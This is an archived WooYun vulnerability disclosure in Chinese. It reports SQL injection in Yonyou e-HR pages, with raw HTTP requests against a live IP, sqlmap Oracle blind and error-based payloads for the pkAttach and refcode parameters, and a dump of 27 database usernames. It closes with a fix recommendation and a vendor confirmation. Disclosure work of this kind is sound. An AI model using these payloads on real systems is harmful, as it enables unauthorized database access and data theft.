乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-14: 细节已通知厂商并且等待厂商处理中 2014-10-14: 厂商已经确认,细节仅向厂商公开 2014-10-17: 细节向第三方安全合作伙伴开放 2014-12-08: 细节向核心白帽子及相关领域专家公开 2014-12-18: 细节向普通白帽子公开 2014-12-28: 细节向实习白帽子公开 2015-01-12: 细节向公众公开
不知道有没有提交过,用友人力资源管理(e-HR)SQL注入漏洞
以http://219.140.193.253/hrss/login.jsp为例子
参考了下 WooYun: 用友人力资源管理(e-HR)SQL注入漏洞 发现一个未授权访问页面http://120.40.72.157:4001/hrss/rm/RmPsnbasdoc.jsp
访问后抓包发现提交了下面数据包(存在sql注入)
GET /hrss/attach.download.d?appName=PSNBASDOC_RM&pkAttach=null HTTP/1.1Host: 120.40.72.157:4001Proxy-Connection: keep-aliveCache-Control: max-age=0Accept: image/webp,*/*;q=0.8If-Modified-Since: Mon, 29 Nov 2010 06:26:56 GMTUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36Referer: http://120.40.72.157:4001/hrss/rm/RmPsnbasdoc.jspAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=0000SEy6l3QB7cxKKvHYMHKoOyF:1832fauj5
算法和payload读取所有用户
Place: GETParameter: pkAttach Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: appName=PSNBASDOC_RM&pkAttach=0001C110000000089L9S' AND 7542=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(84)||CHR(106)||CHR(102),5) AND 'SUXH'='SUXH Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)---[21:38:25] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle[21:38:25] [INFO] fetching database users[21:38:25] [INFO] fetching number of database users[21:38:25] [INFO] resumed: 27database management system users [27]:[*] AAA[*] ANONYMOUS[*] CTXSYS[*] DBSNMP[*] DIP[*] DMSYS[*] EXFSYS[*] IUFO[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] NC[*] NC_TEST[*] OLAPSYS[*] ORACLE_OCM[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SI_INFORMTN_SCHEMA[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB[*] ZHOUJP
还没完当我们点击民族时候抓取如下数据包
GET /hrss/ref.show.d?refcode=HI000000000000000003 HTTP/1.1Host: 120.40.72.157:4001Proxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36Referer: http://120.40.72.157:4001/hrss/rm/RmPsnbasdoc.jspAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=0000SEy6l3QB7cxKKvHYMHKoOyF:1832fauj5
SQLMAP跑了下,算法和payload
sqlmap identified the following injection points with a total of 0 HTTP(s) requsts:---Place: GETParameter: refcode Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: refcode=HI000000000000000003' AND 5453=(SELECT UPPER(XMLType(CHR(6)||CHR(58)||CHR(113)||CHR(113)||CHR(110)||CHR(110)||CHR(113)||(SELECT (CASE WHE (5453=5453) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(110)||CHR(10)||CHR(113)||CHR(62))) FROM DUAL) AND 'iZqc'='iZqc Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_SART]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[OLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'|CHR(62))) FROM DUAL)---[21:42:29] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[21:42:29] [INFO] fetched data logged to text files under 'F:\sqlmapproject-sqlap-ef5ce7e\output\120.40.72.157'[*] shutting down at 21:42:29
发现只要这类url都存在SQL注入其他版本
建议对未授权访问页面加上cookie验证
危害等级:高
漏洞Rank:15
确认时间:2014-10-14 14:56
问题很严重
暂无